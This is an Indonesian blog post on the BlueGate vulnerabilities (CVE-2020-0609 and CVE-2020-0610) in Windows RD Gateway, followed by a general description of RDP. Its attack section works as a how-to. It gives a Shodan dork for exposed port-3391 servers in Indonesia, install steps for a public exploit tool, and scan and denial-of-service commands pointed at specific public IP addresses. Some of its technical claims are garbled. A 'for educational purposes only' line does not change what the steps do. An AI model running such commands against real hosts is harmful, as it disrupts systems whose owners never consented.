BlueGate Exploit


CVE-2020-0609 & CVE-2020-0610



Kedua kerentanan ini memungkinkan Anda untuk mengeksekusi kode dari jarak jauh dalam layanan Windows Remote Control Gateway (RD Gateway), jenis serangan ini memungkinkan peretas untuk terhubung ke server RDP tanpa otentikasi dengan mengirimkan kode jarak jauh ke sistem operasi (0x00 - 0xFFFF)
Data yang akan ditulis juga sewenang-wenang dengan panjang hingga 1000 byte pada suatu waktu dan maksimum 4.096 selama sesi.

RD Gateway Berfungsi sebagai proksi RDP antara beberapa server jaringan internal.
Layanan UDP ini dapat diidentifikasi dengan N. 3391 secara default.

Vuln Vesion
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows Server 2016 
  • Windows Server 2019




Pengertian RDP
RDP merupakan singkatan dari Remote Desktop Protocol merupakan fitur dalam sistem operasi Microsoft Windows seperti XP, windows Server 2003, windows Server 2008, windows server 2012, Vista. Dimana fungsi fasilitas ini memberikan izin kepada pengguna agar mudah terkoneksi pada sebuah mesin jarak jauh ibarat kata, user dapat mengakses beberapa mesin dalam satu mesin tanpa harus berpindah tempat duduk.


Secara default, Remote Desktop Protocol berjalan melalui TCP port 3389. Remote Desktop Protocol (RDP) dibuat dengan berdasarkan protokol T.120 yang merupakan protokol dalam perangkat lunak yang berjarak jauh. Adpaaun sistem operasi yang mendukung pada fasilitas RDP ini yaitu Windows 32-bit ( Windows CE dan PocketPC), Linux, Apple Mac OS X, FreeBSD, UNIX Solaris.

for educational purposes only


Mencari Bug CVE-2020-0609 & CVE-2020-0610
1.Login Ke Shodan Dengan Pro Account
2.Dorking
port:3391 country:"ID"
3.Target yang rentan memiliki respond seperti berikut



Attacking Dan Scanning
 
Installasi
sudo -s
apt-get update
apt-get -y upgrade
apt-get install -y python3-pip
pip3 install pyOpenSSL
pip3 install cryptography
https://github.com/ollypwn/BlueGate

Scanning
python3 BlueGate.py -M check -P 3391 110.35.81.137
Attacking
python3 BlueGate.py -M dos -P 3391 202.169.44.125



Mungkin itu saja untuk artikel kali ini, jika ada yang kurang dipahami atau ingin bertanya silahkan menghubungi kami via fanspage.

Terimakasih dan semoga bermanfaat :)

Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.